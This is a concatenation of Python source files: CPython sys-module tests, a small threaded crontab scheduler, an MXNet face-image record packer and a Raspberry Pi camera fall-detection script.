@test.support.cpython_only
def test_clear_type_cache(self):
sys._clear_type_cache()
def test_ioencoding(self):
env = dict(os.environ)
# Test character: cent sign, encoded as 0x4A (ASCII J) in CP424,
# not representable in ASCII.
env["PYTHONIOENCODING"] = "cp424"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
expected = ("\xa2" + os.linesep).encode("cp424")
self.assertEqual(out, expected)
env["PYTHONIOENCODING"] = "ascii:replace"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, b'?')
env["PYTHONIOENCODING"] = "ascii"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
env=env)
out, err = p.communicate()
self.assertEqual(out, b'')
self.assertIn(b'UnicodeEncodeError:', err)
self.assertIn(rb"'\xa2'", err)
env["PYTHONIOENCODING"] = "ascii:"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
env=env)
out, err = p.communicate()
self.assertEqual(out, b'')
self.assertIn(b'UnicodeEncodeError:', err)
self.assertIn(rb"'\xa2'", err)
env["PYTHONIOENCODING"] = ":surrogateescape"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xdcbd))'],
stdout=subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, b'\xbd')
@unittest.skipUnless(test.support.FS_NONASCII,
'requires OS support of non-ASCII encodings')
def test_ioencoding_nonascii(self):
env = dict(os.environ)
env["PYTHONIOENCODING"] = ""
p = subprocess.Popen([sys.executable, "-c",
'print(%a)' % test.support.FS_NONASCII],
stdout=subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, os.fsencode(test.support.FS_NONASCII))
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
def test_executable(self):
# sys.executable should be absolute
self.assertEqual(os.path.abspath(sys.executable), sys.executable)
# Issue #7774: Ensure that sys.executable is an empty string if argv[0]
# has been set to a non existent program name and Python is unable to
# retrieve the real program name
# For a normal installation, it should work without 'cwd'
# argument. For test runs in the build directory, see #7774.
python_dir = os.path.dirname(os.path.realpath(sys.executable))
p = subprocess.Popen(
["nonexistent", "-c",
'import sys; print(sys.executable.encode("ascii", "backslashreplace"))'],
executable=sys.executable, stdout=subprocess.PIPE, cwd=python_dir)
stdout = p.communicate()[0]
executable = stdout.strip().decode("ASCII")
p.wait()
self.assertIn(executable, ["b''", repr(sys.executable.encode("ascii", "backslashreplace"))])
def check_fsencoding(self, fs_encoding, expected=None):
self.assertIsNotNone(fs_encoding)
codecs.lookup(fs_encoding)
if expected:
self.assertEqual(fs_encoding, expected)
def test_getfilesystemencoding(self):
fs_encoding = sys.getfilesystemencoding()
if sys.platform == 'darwin':
expected = 'utf-8'
elif sys.platform == 'win32':
expected = 'mbcs'
else:
expected = None
self.check_fsencoding(fs_encoding, expected)
def c_locale_get_error_handler(self, isolated=False, encoding=None):
# Force the POSIX locale
env = os.environ.copy()
env["LC_ALL"] = "C"
code = '\n'.join((
'import sys',
'def dump(name):',
' std = getattr(sys, name)',
' print("%s: %s" % (name, std.errors))',
'dump("stdin")',
'dump("stdout")',
'dump("stderr")',
))
args = [sys.executable, "-c", code]
if isolated:
args.append("-I")
if encoding is not None:
env['PYTHONIOENCODING'] = encoding
else:
env.pop('PYTHONIOENCODING', None)
p = subprocess.Popen(args,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
env=env,
universal_newlines=True)
stdout, stderr = p.communicate()
return stdout
def test_c_locale_surrogateescape(self):
out = self.c_locale_get_error_handler(isolated=True)
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
# replace the default error handler
out = self.c_locale_get_error_handler(encoding=':ignore')
self.assertEqual(out,
'stdin: ignore\n'
'stdout: ignore\n'
'stderr: backslashreplace\n')
# force the encoding
out = self.c_locale_get_error_handler(encoding='iso8859-1')
self.assertEqual(out,
'stdin: strict\n'
'stdout: strict\n'
'stderr: backslashreplace\n')
out = self.c_locale_get_error_handler(encoding='iso8859-1:')
self.assertEqual(out,
'stdin: strict\n'
'stdout: strict\n'
'stderr: backslashreplace\n')
# have no any effect
out = self.c_locale_get_error_handler(encoding=':')
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
out = self.c_locale_get_error_handler(encoding='')
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
def test_implementation(self):
# This test applies to all implementations equally.
levels = {'alpha': 0xA, 'beta': 0xB, 'candidate': 0xC, 'final': 0xF}
self.assertTrue(hasattr(sys.implementation, 'name'))
self.assertTrue(hasattr(sys.implementation, 'version'))
self.assertTrue(hasattr(sys.implementation, 'hexversion'))
self.assertTrue(hasattr(sys.implementation, 'cache_tag'))
version = sys.implementation.version
self.assertEqual(version[:2], (version.major, version.minor))
hexversion = (version.major << 24 | version.minor << 16 |
version.micro << 8 | levels[version.releaselevel] << 4 |
version.serial << 0)
self.assertEqual(sys.implementation.hexversion, hexversion)
# PEP 421 requires that .name be lower case.
self.assertEqual(sys.implementation.name,
sys.implementation.name.lower())
@test.support.cpython_only
def test_debugmallocstats(self):
# Test sys._debugmallocstats()
from test.support.script_helper import assert_python_ok
args = ['-c', 'import sys; sys._debugmallocstats()']
ret, out, err = assert_python_ok(*args)
self.assertIn(b"free PyDictObjects", err)
# The function has no parameter
self.assertRaises(TypeError, sys._debugmallocstats, True)
@unittest.skipUnless(hasattr(sys, "getallocatedblocks"),
"sys.getallocatedblocks unavailable on this build")
def test_getallocatedblocks(self):
# Some sanity checks
with_pymalloc = sysconfig.get_config_var('WITH_PYMALLOC')
a = sys.getallocatedblocks()
self.assertIs(type(a), int)
if with_pymalloc:
self.assertGreater(a, 0)
else:
# When WITH_PYMALLOC isn't available, we don't know anything
# about the underlying implementation: the function might
# return 0 or something greater.
self.assertGreaterEqual(a, 0)
try:
# While we could imagine a Python session where the number of
# multiple buffer objects would exceed the sharing of references,
# it is unlikely to happen in a normal test run.
self.assertLess(a, sys.gettotalrefcount())
except AttributeError:
# gettotalrefcount() not available
pass
gc.collect()
b = sys.getallocatedblocks()
self.assertLessEqual(b, a)
gc.collect()
c = sys.getallocatedblocks()
self.assertIn(c, range(b - 50, b + 50))
@test.support.requires_type_collecting
def test_is_finalizing(self):
self.assertIs(sys.is_finalizing(), False)
# Don't use the atexit module because _Py_Finalizing is only set
# after calling atexit callbacks
code = """if 1:
import sys
class AtExit:
is_finalizing = sys.is_finalizing
print = print
def __del__(self):
self.print(self.is_finalizing(), flush=True)
# Keep a reference in the __main__ module namespace, so the
# AtExit destructor will be called at Python exit
ref = AtExit()
"""
rc, stdout, stderr = assert_python_ok('-c', code)
if test.support.check_impl_detail(cpython=True):
self.assertEqual(stdout.rstrip(), b'True')
else:
# the __del__ method may or may not have been called
# in other Python implementations
self.assertIn(stdout.rstrip(), {b'True', b''})
@test.support.cpython_only
class SizeofTest(unittest.TestCase):
def setUp(self):
self.P = struct.calcsize('P')
self.longdigit = sys.int_info.sizeof_digit
import _testcapi
self.gc_headsize = _testcapi.SIZEOF_PYGC_HEAD
check_sizeof = test.support.check_sizeof
def test_gc_head_size(self):
# Check that the gc header size is added to objects tracked by the gc.
vsize = test.support.calcvobjsize
gc_header_size = self.gc_headsize
# bool objects are not gc tracked
self.assertEqual(sys.getsizeof(True), vsize('') + self.longdigit)
# but lists are
self.assertEqual(sys.getsizeof([]), vsize('Pn') + gc_header_size)
def test_errors(self):
class BadSizeof:
def __sizeof__(self):
raise ValueError
self.assertRaises(ValueError, sys.getsizeof, BadSizeof())
class InvalidSizeof:
def __sizeof__(self):
return None
self.assertRaises(TypeError, sys.getsizeof, InvalidSizeof())
sentinel = ["sentinel"]
self.assertIs(sys.getsizeof(InvalidSizeof(), sentinel), sentinel)
class FloatSizeof:
def __sizeof__(self):
return 4.5
self.assertRaises(TypeError, sys.getsizeof, FloatSizeof())
self.assertIs(sys.getsizeof(FloatSizeof(), sentinel), sentinel)
class OverflowSizeof(int):
def __sizeof__(self):
return int(self)
self.assertEqual(sys.getsizeof(OverflowSizeof(sys.maxsize)),
sys.maxsize + self.gc_headsize)
with self.assertRaises(OverflowError):
sys.getsizeof(OverflowSizeof(sys.maxsize + 1))
with self.assertRaises(ValueError):
sys.getsizeof(OverflowSizeof(-1))
with self.assertRaises((ValueError, OverflowError)):
sys.getsizeof(OverflowSizeof(-sys.maxsize - 1))
def test_default(self):
size = test.support.calcvobjsize
self.assertEqual(sys.getsizeof(True), size('') + self.longdigit)
self.assertEqual(sys.getsizeof(True, -1), size('') + self.longdigit)
def test_objecttypes(self):
# check all types defined in Objects/
calcsize = struct.calcsize
size = test.support.calcobjsize
vsize = test.support.calcvobjsize
check = self.check_sizeof
# bool
check(True, vsize('') + self.longdigit)
# buffer
# XXX
# builtin_function_or_method
check(len, size('4P')) # XXX check layout
# bytearray
samples = [b'', b'u'*100000]
for sample in samples:
x = bytearray(sample)
check(x, vsize('n2Pi') + x.__alloc__())
# bytearray_iterator
check(iter(bytearray()), size('nP'))
# bytes
check(b'', vsize('n') + 1)
check(b'x' * 10, vsize('n') + 11)
# cell
def get_cell():
x = 42
def inner():
return x
return inner
check(get_cell().__closure__[0], size('P'))
# code
check(get_cell().__code__, size('5i9Pi3P'))
check(get_cell.__code__, size('5i9Pi3P'))
def get_cell2(x):
def inner():
return x
return inner
check(get_cell2.__code__, size('5i9Pi3P') + 1)
# complex
check(complex(0,1), size('2d'))
# method_descriptor (descriptor object)
check(str.lower, size('3PP'))
# classmethod_descriptor (descriptor object)
# XXX
# member_descriptor (descriptor object)
import datetime
check(datetime.timedelta.days, size('3PP'))
# getset_descriptor (descriptor object)
import collections
check(collections.defaultdict.default_factory, size('3PP'))
# wrapper_descriptor (descriptor object)
check(int.__add__, size('3P2P'))
# method-wrapper (descriptor object)
check({}.__iter__, size('2P'))
# dict
check({}, size('n2P') + calcsize('2nPn') + 8*calcsize('n2P'))
longdict = {1:1, 2:2, 3:3, 4:4, 5:5, 6:6, 7:7, 8:8}
check(longdict, size('n2P') + calcsize('2nPn') + 16*calcsize('n2P'))
# dictionary-keyview
check({}.keys(), size('P'))
# dictionary-valueview
check({}.values(), size('P'))
# dictionary-itemview
check({}.items(), size('P'))
# dictionary iterator
check(iter({}), size('P2nPn'))
# dictionary-keyiterator
check(iter({}.keys()), size('P2nPn'))
# dictionary-valueiterator
check(iter({}.values()), size('P2nPn'))
# dictionary-itemiterator
check(iter({}.items()), size('P2nPn'))
# dictproxy
class C(object): pass
check(C.__dict__, size('P'))
# BaseException
check(BaseException(), size('5Pb'))
# UnicodeEncodeError
check(UnicodeEncodeError("", "", 0, 0, ""), size('5Pb 2P2nP'))
# UnicodeDecodeError
check(UnicodeDecodeError("", b"", 0, 0, ""), size('5Pb 2P2nP'))
# UnicodeTranslateError
check(UnicodeTranslateError("", 0, 1, ""), size('5Pb 2P2nP'))
# ellipses
check(Ellipsis, size(''))
# EncodingMap
import codecs, encodings.iso8859_3
x = codecs.charmap_build(encodings.iso8859_3.decoding_table)
check(x, size('32B2iB'))
# enumerate
check(enumerate([]), size('n3P'))
# reverse
check(reversed(''), size('nP'))
# float
check(float(0), size('d'))
# sys.floatinfo
check(sys.float_info, vsize('') + self.P * len(sys.float_info))
# frame
import inspect
CO_MAXBLOCKS = 20
x = inspect.currentframe()
ncells = len(x.f_code.co_cellvars)
nfrees = len(x.f_code.co_freevars)
extras = x.f_code.co_stacksize + x.f_code.co_nlocals +\
ncells + nfrees - 1
check(x, vsize('12P3ic' + CO_MAXBLOCKS*'3i' + 'P' + extras*'P'))
# function
def func(): pass
check(func, size('12P'))
class c():
@staticmethod
def foo():
pass
@classmethod
def bar(cls):
pass
# staticmethod
check(foo, size('PP'))
# classmethod
check(bar, size('PP'))
# generator
def get_gen(): yield 1
check(get_gen(), size('Pb2PPP'))
# iterator
check(iter('abc'), size('lP'))
# callable-iterator
import re
check(re.finditer('',''), size('2P'))
# list
samples = [[], [1,2,3], ['1', '2', '3']]
for sample in samples:
check(sample, vsize('Pn') + len(sample)*self.P)
# sortwrapper (list)
# XXX
# cmpwrapper (list)
# XXX
# listiterator (list)
check(iter([]), size('lP'))
# listreverseiterator (list)
check(reversed([]), size('nP'))
# int
check(0, vsize(''))
check(1, vsize('') + self.longdigit)
check(-1, vsize('') + self.longdigit)
PyLong_BASE = 2**sys.int_info.bits_per_digit
check(int(PyLong_BASE), vsize('') + 2*self.longdigit)
check(int(PyLong_BASE**2-1), vsize('') + 2*self.longdigit)
check(int(PyLong_BASE**2), vsize('') + 3*self.longdigit)
# module
check(unittest, size('PnPPP'))
# None
check(None, size(''))
# NotImplementedType
check(NotImplemented, size(''))
# object
check(object(), size(''))
# property (descriptor object)
class C(object):
def getx(self): return self.__x
def setx(self, value): self.__x = value
def delx(self): del self.__x
x = property(getx, setx, delx, "")
check(x, size('4Pi'))
# PyCapsule
# XXX
# rangeiterator
check(iter(range(1)), size('4l'))
# reverse
check(reversed(''), size('nP'))
# range
check(range(1), size('4P'))
check(range(66000), size('4P'))
# set
# frozenset
PySet_MINSIZE = 8
samples = [[], range(10), range(50)]
s = size('3nP' + PySet_MINSIZE*'nP' + '2nP')
for sample in samples:
minused = len(sample)
if minused == 0: tmp = 1
# the computation of minused is actually a bit more complicated
# but this suffices for the sizeof test
minused = minused*2
newsize = PySet_MINSIZE
while newsize <= minused:
newsize = newsize << 1
if newsize <= 8:
check(set(sample), s)
check(frozenset(sample), s)
else:
check(set(sample), s + newsize*calcsize('nP'))
check(frozenset(sample), s + newsize*calcsize('nP'))
# setiterator
check(iter(set()), size('P3n'))
# slice
check(slice(0), size('3P'))
# super
check(super(int), size('3P'))
# tuple
check((), vsize(''))
check((1,2,3), vsize('') + 3*self.P)
# type
# static type: PyTypeObject
fmt = 'P2n15Pl4Pn9Pn11PIP'
if hasattr(sys, 'getcounts'):
fmt += '3n2P'
s = vsize(fmt)
check(int, s)
s = vsize(fmt + # PyTypeObject
'3P' # PyAsyncMethods
'36P' # PyNumberMethods
'3P' # PyMappingMethods
'10P' # PySequenceMethods
'2P' # PyBufferProcs
'4P')
# Separate block for PyDictKeysObject with 4 entries
s += calcsize("2nPn") + 4*calcsize("n2P")
# class
class newstyleclass(object): pass
check(newstyleclass, s)
# dict with shared keys
check(newstyleclass().__dict__, size('n2P' + '2nPn'))
# unicode
# each tuple contains a string and its expected character size
# don't put any static strings here, as they may contain
# wchar_t or UTF-8 representations
samples = ['1'*100, '\xff'*50,
'\u0100'*40, '\uffff'*100,
'\U00010000'*30, '\U0010ffff'*100]
asciifields = "nnbP"
compactfields = asciifields + "nPn"
unicodefields = compactfields + "P"
for s in samples:
maxchar = ord(max(s))
if maxchar < 128:
L = size(asciifields) + len(s) + 1
elif maxchar < 256:
L = size(compactfields) + len(s) + 1
elif maxchar < 65536:
L = size(compactfields) + 2*(len(s) + 1)
else:
L = size(compactfields) + 4*(len(s) + 1)
check(s, L)
# verify that the UTF-8 size is accounted for
s = chr(0x4000) # 4 bytes canonical representation
check(s, size(compactfields) + 4)
# compile() will trigger the generation of the UTF-8
# representation as a side effect
compile(s, "<stdin>", "eval")
check(s, size(compactfields) + 4 + 4)
# TODO: add check that forces the presence of wchar_t representation
# TODO: add check that forces layout of unicodefields
# weakref
import weakref
check(weakref.ref(int), size('2Pn2P'))
# weakproxy
# XXX
# weakcallableproxy
check(weakref.proxy(int), size('2Pn2P'))
def check_slots(self, obj, base, extra):
expected = sys.getsizeof(base) + struct.calcsize(extra)
if gc.is_tracked(obj) and not gc.is_tracked(base):
expected += self.gc_headsize
self.assertEqual(sys.getsizeof(obj), expected)
def test_slots(self):
# check all subclassable types defined in Objects/ that allow
# non-empty __slots__
check = self.check_slots
class BA(bytearray):
__slots__ = 'a', 'b', 'c'
check(BA(), bytearray(), '3P')
class D(dict):
__slots__ = 'a', 'b', 'c'
check(D(x=[]), {'x': []}, '3P')
class L(list):
__slots__ = 'a', 'b', 'c'
check(L(), [], '3P')
class S(set):
__slots__ = 'a', 'b', 'c'
check(S(), set(), '3P')
class FS(frozenset):
__slots__ = 'a', 'b', 'c'
check(FS(), frozenset(), '3P')
from collections import OrderedDict
class OD(OrderedDict):
__slots__ = 'a', 'b', 'c'
check(OD(x=[]), OrderedDict(x=[]), '3P')
def test_pythontypes(self):
# check all types defined in Python/
size = test.support.calcobjsize
vsize = test.support.calcvobjsize
check = self.check_sizeof
# _ast.AST
import _ast
check(_ast.AST(), size('P'))
try:
raise TypeError
except TypeError:
tb = sys.exc_info()[2]
# traceback
if tb is not None:
check(tb, size('2P2i'))
# symtable entry
# XXX
# sys.flags
check(sys.flags, vsize('') + self.P * len(sys.flags))
def test_main():
test.support.run_unittest(SysModuleTest, SizeofTest)
if __name__ == "__main__":
test_main()
|
crontab.py | # -*- coding: utf-8 -*-
import time
import logging
import traceback
from threading import Lock, Thread, current_thread
LOG = logging.getLogger('crontab')
class Task(object):
def __init__(self, name, interval, callback):
self.name = name
self.latest_run = 0
self._interval = interval
self._callback = callback
self._picked = False
def run(self):
self.latest_run = time.time()
self._callback()
def pick(self):
if self._picked:
return False
if self.latest_run + self._interval > time.time():
return False
self._picked = True
return True
def release(self):
self._picked = False
class Crontab(object):
"""crontab implement simple crontab dispatch"""
def __init__(self, threads, accuracy):
"""create crontab with gived working threads and accuracy
:threads: thread pool size defalut 1
:accuracy: min time interval use by crontab defalut 1s
"""
self._accuracy = accuracy
self._pick_lock = Lock()
self._crontab_list = {}
self._threads = []
self._stoped = False
self._start_worker(threads)
def _start_worker(self, threads):
for i in range(threads):
name = 'crontab_worker_{}'.format(i)
t = Thread(target=self._worker, name=name)
t.start()
LOG.info('start worker %s', name)
self._threads.append(t)
def stop(self):
""" stop crontab """
self._stoped = True
for t in self._threads:
t.join()
def add_task(self, name, interval, callback):
LOG.info('add task %s, interval %ds', name, interval)
self._crontab_list[name] = Task(name, interval, callback)
def _worker(self):
while True:
if self._stoped:
LOG.info('stoped %s quit!', current_thread().name)
return
task = self._pick()
if task is not None:
LOG.info('run task %s in %s', task.name, current_thread().name)
try:
task.run()
except Exception as e:
LOG.error('task raise exception %s', str(e))
traceback.print_exc()
task.release()
continue
time.sleep(self._accuracy)
def _pick(self):
self._pick_lock.acquire()
for name, task in self._crontab_list.items():
if task.pick():
self._pick_lock.release()
return task
self._pick_lock.release()
return None
|
face2rec2.py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# -*- coding: utf-8 -*-
from __future__ import print_function
import os
import sys
#curr_path = os.path.abspath(os.path.dirname(__file__))
#sys.path.append(os.path.join(curr_path, "../python"))
import mxnet as mx
import random
import argparse
import cv2
import time
import traceback
#from builtins import range
from easydict import EasyDict as edict
sys.path.append(os.path.join(os.path.dirname(__file__), '..', 'common'))
import face_preprocess
import face_image
try:
import multiprocessing
except ImportError:
multiprocessing = None
def read_list(path_in):
with open(path_in) as fin:
identities = []
last = [-1, -1]
_id = 1
while True:
line = fin.readline()
if not line:
break
item = edict()
item.flag = 0
item.image_path, label, item.bbox, item.landmark, item.aligned = face_preprocess.parse_lst_line(line)
if not item.aligned and item.landmark is None:
#print('ignore line', line)
continue
item.id = _id
item.label = [label, item.aligned]
yield item
if label!=last[0]:
if last[1]>=0:
identities.append( (last[1], _id) )
last[0] = label
last[1] = _id
_id+=1
identities.append( (last[1], _id) )
item = edict()
item.flag = 2
item.id = 0
item.label = [float(_id), float(_id+len(identities))]
yield item
for identity in identities:
item = edict()
item.flag = 2
item.id = _id
_id+=1
item.label = [float(identity[0]), float(identity[1])]
yield item
def image_encode(args, i, item, q_out):
oitem = [item.id]
#print('flag', item.flag)
if item.flag==0:
fullpath = item.image_path
header = mx.recordio.IRHeader(item.flag, item.label, item.id, 0)
#print('write', item.flag, item.id, item.label)
if item.aligned:
with open(fullpath, 'rb') as fin:
img = fin.read()
s = mx.recordio.pack(header, img)
q_out.put((i, s, oitem))
else:
img = cv2.imread(fullpath, args.color)
assert item.landmark is not None
img = face_preprocess.preprocess(img, bbox = item.bbox, landmark=item.landmark, image_size='%d,%d'%(args.image_h, args.image_w))
s = mx.recordio.pack_img(header, img, quality=args.quality, img_fmt=args.encoding)
q_out.put((i, s, oitem))
else:
header = mx.recordio.IRHeader(item.flag, item.label, item.id, 0)
#print('write', item.flag, item.id, item.label)
s = mx.recordio.pack(header, '')
q_out.put((i, s, oitem))
def read_worker(args, q_in, q_out):
while True:
deq = q_in.get()
if deq is None:
break
i, item = deq
image_encode(args, i, item, q_out)
def write_worker(q_out, fname, working_dir):
pre_time = time.time()
count = 0
fname = os.path.basename(fname)
fname_rec = os.path.splitext(fname)[0] + '.rec'
fname_idx = os.path.splitext(fname)[0] + '.idx'
record = mx.recordio.MXIndexedRecordIO(os.path.join(working_dir, fname_idx),
os.path.join(working_dir, fname_rec), 'w')
buf = {}
more = True
while more:
deq = q_out.get()
if deq is not None:
i, s, item = deq
buf[i] = (s, item)
else:
more = False
while count in buf:
s, item = buf[count]
del buf[count]
if s is not None:
#print('write idx', item[0])
record.write_idx(item[0], s)
if count % 1000 == 0:
cur_time = time.time()
print('time:', cur_time - pre_time, ' count:', count)
pre_time = cur_time
count += 1
def parse_args():
parser = argparse.ArgumentParser(
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
description='Create an image list or \
make a record database by reading from an image list')
parser.add_argument('prefix', help='prefix of input/output lst and rec files.')
#parser.add_argument('root', help='path to folder containing images.')
cgroup = parser.add_argument_group('Options for creating image lists')
cgroup.add_argument('--list', type=bool, default=False,
help='If this is set im2rec will create image list(s) by traversing root folder\
and output to <prefix>.lst.\
Otherwise im2rec will read <prefix>.lst and create a database at <prefix>.rec')
cgroup.add_argument('--exts', nargs='+', default=['.jpeg', '.jpg'],
help='list of acceptable image extensions.')
cgroup.add_argument('--chunks', type=int, default=1, help='number of chunks.')
cgroup.add_argument('--train-ratio', type=float, default=1.0,
help='Ratio of images to use for training.')
cgroup.add_argument('--test-ratio', type=float, default=0,
help='Ratio of images to use for testing.')
cgroup.add_argument('--recursive', type=bool, default=False,
help='If true recursively walk through subdirs and assign an unique label\
to images in each folder. Otherwise only include images in the root folder\
and give them label 0.')
cgroup.add_argument('--shuffle', type=bool, default=True, help='If this is set as True, \
im2rec will randomize the image order in <prefix>.lst')
rgroup = parser.add_argument_group('Options for creating database')
rgroup.add_argument('--quality', type=int, default=95,
help='JPEG quality for encoding, 1-100; or PNG compression for encoding, 1-9')
rgroup.add_argument('--num-thread', type=int, default=1,
help='number of thread to use for encoding. order of images will be different\
from the input list if >1. the input list will be modified to match the\
resulting order.')
rgroup.add_argument('--color', type=int, default=1, choices=[-1, 0, 1],
help='specify the color mode of the loaded image.\
1: Loads a color image. Any transparency of image will be neglected. It is the default flag.\
0: Loads image in grayscale mode.\
-1:Loads image as such including alpha channel.')
rgroup.add_argument('--encoding', type=str, default='.jpg', choices=['.jpg', '.png'],
help='specify the encoding of the images.')
rgroup.add_argument('--pack-label', type=bool, default=False,
help='Whether to also pack multi dimensional label in the record file')
args = parser.parse_args()
args.prefix = os.path.abspath(args.prefix)
#args.root = os.path.abspath(args.root)
return args
if __name__ == '__main__':
args = parse_args()
if args.list:
pass
#make_list(args)
else:
if os.path.isdir(args.prefix):
working_dir = args.prefix
else:
working_dir = os.path.dirname(args.prefix)
prop = face_image.load_property(working_dir)
image_size = prop.image_size
print('image_size', image_size)
args.image_h = image_size[0]
args.image_w = image_size[1]
files = [os.path.join(working_dir, fname) for fname in os.listdir(working_dir)
if os.path.isfile(os.path.join(working_dir, fname))]
count = 0
for fname in files:
if fname.startswith(args.prefix) and fname.endswith('.lst'):
print('Creating .rec file from', fname, 'in', working_dir)
count += 1
image_list = read_list(fname)
# -- write_record -- #
if args.num_thread > 1 and multiprocessing is not None:
q_in = [multiprocessing.Queue(1024) for i in range(args.num_thread)]
q_out = multiprocessing.Queue(1024)
read_process = [multiprocessing.Process(target=read_worker, args=(args, q_in[i], q_out)) \
for i in range(args.num_thread)]
for p in read_process:
p.start()
write_process = multiprocessing.Process(target=write_worker, args=(q_out, fname, working_dir))
write_process.start()
for i, item in enumerate(image_list):
q_in[i % len(q_in)].put((i, item))
for q in q_in:
q.put(None)
for p in read_process:
p.join()
q_out.put(None)
write_process.join()
else:
print('multiprocessing not available, fall back to single threaded encoding')
try:
import Queue as queue
except ImportError:
import queue
q_out = queue.Queue()
fname = os.path.basename(fname)
fname_rec = os.path.splitext(fname)[0] + '.rec'
fname_idx = os.path.splitext(fname)[0] + '.idx'
record = mx.recordio.MXIndexedRecordIO(os.path.join(working_dir, fname_idx),
os.path.join(working_dir, fname_rec), 'w')
cnt = 0
pre_time = time.time()
for i, item in enumerate(image_list):
image_encode(args, i, item, q_out)
if q_out.empty():
continue
_, s, item = q_out.get()
#header, _ = mx.recordio.unpack(s)
#print('write header label', header.label)
record.write_idx(item[0], s)
if cnt % 1000 == 0:
cur_time = time.time()
print('time:', cur_time - pre_time, ' count:', cnt)
pre_time = cur_time
cnt += 1
if not count:
print('Did not find and list file with prefix %s'%args.prefix)
|
fall_det_3thread.py |
debug = 1
from picamera.array import PiRGBArray
from threading import Thread
from picamera import PiCamera
import RPi.GPIO as GPIO
import Queue
import time
import cv2
GPIO.cleanup()
GPIO.setmode(GPIO.BCM)
GPIO.setup(20, GPIO.OUT)
readyContour = Queue.Queue()
ggframes = Queue.Queue()
def convertFrame (frame):
r = 750.0 / frame.shape[1]
dim = (750, int(frame.shape[0] * r))
frame = cv2.resize(frame, dim, interpolation = cv2.INTER_AREA)
return frame
def applyGaussian(frame,ggframes):
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
if useGaussian:
gray = cv2.GaussianBlur(gray, (gaussianPixels, gaussianPixels), 0)
ggframes.put(gray)
def calculateFrameDiff(firstFrame,gray,readyContour):
frameDelta = cv2.absdiff(firstFrame, gray)
thresh = cv2.threshold(frameDelta, thresholdLimit, 255, cv2.THRESH_BINARY)[1]
thresh = cv2.dilate(thresh, None, iterations=dilationPixels) # dilate thresh
_, contours, _ = cv2.findContours(thresh.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE) #find contours
readyContour.put(contours)
# Video or camera
camera = PiCamera()
camera.vflip = True
camera.resolution = (1024, 864)
camera.framerate = 32
rawCapture = PiRGBArray(camera, size=(1024, 864))
time.sleep(1.0)
firstFrame = None
start = time.time()
i = 0
lastH = [0]*100
lastW = [0]*100
boxPosition = [0]*100
# Detect parameters
widthRatio = 1.40
minArea = 40*40
thresholdLimit = 20
dilationPixels = 20 # 10
useGaussian = 1
gaussianPixels = 31
contours=[]
upDateFrame=0
firstTime=True
fallState = ""
redBox = (0,0,255)
greenBox = (124,252,0)
boxColor=redBox
# loop for each frame in video
for frame in camera.capture_continuous(rawCapture, format="bgr", use_video_port=True):
detectStatus = "Empty"
frame = frame.array
frame = convertFrame(frame)
if firstTime==True:
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
if useGaussian:
gray = cv2.GaussianBlur(gray, (gaussianPixels, gaussianPixels), 0)
firstTime=False
gthread = Thread(target = applyGaussian,args = (frame,ggframes))
if gthread.isAlive()==False:
gthread.start()
if ggframes.empty()==False:
gray=ggframes.get_nowait()
if firstFrame is None:
rawCapture.truncate(0)
time.sleep(1.0) # let camera autofocus + autosaturation settle
firstFrame = gray
continue
thread = Thread(target = calculateFrameDiff, args = (firstFrame,gray,readyContour))
if thread.isAlive()==False:
thread.start()
if readyContour.empty()==False:
contours=readyContour.get_nowait()
if not contours:
GPIO.output(20,False)
for contour in contours:
if cv2.contourArea(contour) < minArea:
continue
#Drawing rect over contour
(x, y, w, h) = cv2.boundingRect(contour)
cv2.rectangle(frame, (x, y), (x + w, y + h), boxColor, 2)
boxPosition[i] = x+y
if w > h*widthRatio:
GPIO.output(20,True)
fallState = "Alarm!"
boxColor=redBox
print "Alarm: " + format(time.time())
else:
fallState = ""
boxColor = greenBox
lastW[i] = w
lastH[i] = h
#cv2.putText(frame,"{}".format(cv2.contourArea(contour)), (x, y+h+20), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255), 1)
cv2.putText(frame, "{}".format(i), (x, y+22), cv2.FONT_HERSHEY_SIMPLEX, 0.8, boxColor, 1)
cv2.putText(frame, "{}".format(fallState), (x+22, y+22), cv2.FONT_HERSHEY_SIMPLEX, 0.8, boxColor, 1)
detectStatus = "Ok"
i+=1
#Hud + fps
if debug:
end = time.time()
seconds = end - start
fps = round((1 / seconds), 1)
start = time.time()
cv2.putText(frame, "Detect: {}".format(detectStatus), (10, 20), cv2.FONT_HERSHEY_SIMPLEX, 0.8, (0, 140, 255), 1)
cv2.putText(frame, "FPS: {}".format(fps), (400, 20), cv2.FONT_HERSHEY_SIMPLEX, 0.8, (0, 140, 255), 1)
#cv2.imshow("frameDelta", frameDelta)
#cv2.imshow("Thresh", thresh)
